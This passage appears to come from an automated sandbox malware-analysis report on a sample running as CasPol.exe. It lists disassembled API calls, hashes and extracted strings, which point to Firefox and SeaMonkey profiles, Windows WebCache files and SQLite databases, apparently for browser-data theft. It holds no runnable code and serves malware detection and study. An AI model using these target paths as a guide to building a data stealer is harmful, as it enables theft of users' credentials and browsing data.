                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                  • memset.MSVCRT ref: 00403F6B
                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                  • API String ID: 3527940856-2068335096
                                                                                                                  • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                  • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403FE1
                                                                                                                  • memset.MSVCRT ref: 00403FF6
                                                                                                                  • memset.MSVCRT ref: 0040400B
                                                                                                                  • memset.MSVCRT ref: 00404020
                                                                                                                  • memset.MSVCRT ref: 00404035
                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                  • memset.MSVCRT ref: 004040FC
                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                  • API String ID: 3527940856-3369679110
                                                                                                                  • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                  • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                  • API String ID: 3510742995-2641926074
                                                                                                                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                  • memset.MSVCRT ref: 004033B7
                                                                                                                  • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                  • wcscmp.MSVCRT ref: 004033FC
                                                                                                                  • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                  • String ID: $0.@
                                                                                                                  • API String ID: 2758756878-1896041820
                                                                                                                  • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                  • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2941347001-0
                                                                                                                  • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                  • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                  • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                  • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403C09
                                                                                                                  • memset.MSVCRT ref: 00403C1E
                                                                                                                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                  • wcscat.MSVCRT ref: 00403C47
                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                  • wcscat.MSVCRT ref: 00403C70
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                  • API String ID: 3249829328-1174173950
                                                                                                                  • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                  • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                  • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                  • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040A824
                                                                                                                  • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                  • wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                  • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 669240632-0
                                                                                                                  • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                  • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                  • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                  • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                  APIs
                                                                                                                  • wcschr.MSVCRT ref: 00414458
                                                                                                                  • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                  • String ID: "%s"
                                                                                                                  • API String ID: 1343145685-3297466227
                                                                                                                  • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                  • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                  • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                  • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                                                  • API String ID: 1714573020-3385500049
                                                                                                                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004087D6
                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                  • memset.MSVCRT ref: 00408828
                                                                                                                  • memset.MSVCRT ref: 00408840
                                                                                                                  • memset.MSVCRT ref: 00408858
                                                                                                                  • memset.MSVCRT ref: 00408870
                                                                                                                  • memset.MSVCRT ref: 00408888
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2911713577-0
                                                                                                                  • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                  • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                  • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                  • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                  APIs
                                                                                                                  • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                  • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                  • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmp
                                                                                                                  • String ID: @ $SQLite format 3
                                                                                                                  • API String ID: 1475443563-3708268960
                                                                                                                  • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                  • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                  • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                  • memset.MSVCRT ref: 00414C87
                                                                                                                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                  • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                  Strings
                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                  • API String ID: 2705122986-2036018995
                                                                                                                  • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                  • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                  • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                  • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmpqsort
                                                                                                                  • String ID: /nosort$/sort
                                                                                                                  • API String ID: 1579243037-1578091866
                                                                                                                  • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                  • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040E60F
                                                                                                                  • memset.MSVCRT ref: 0040E629
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                  Strings
                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                  • API String ID: 3354267031-2114579845
                                                                                                                  • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                  • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                  APIs
                                                                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3473537107-0
                                                                                                                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                  • API String ID: 2221118986-1725073988
                                                                                                                  • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                  • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@DeleteObject
                                                                                                                  • String ID: r!A
                                                                                                                  • API String ID: 1103273653-628097481
                                                                                                                  • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                  • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                  • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                  • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1033339047-0
                                                                                                                  • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                  • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                  • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                  • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
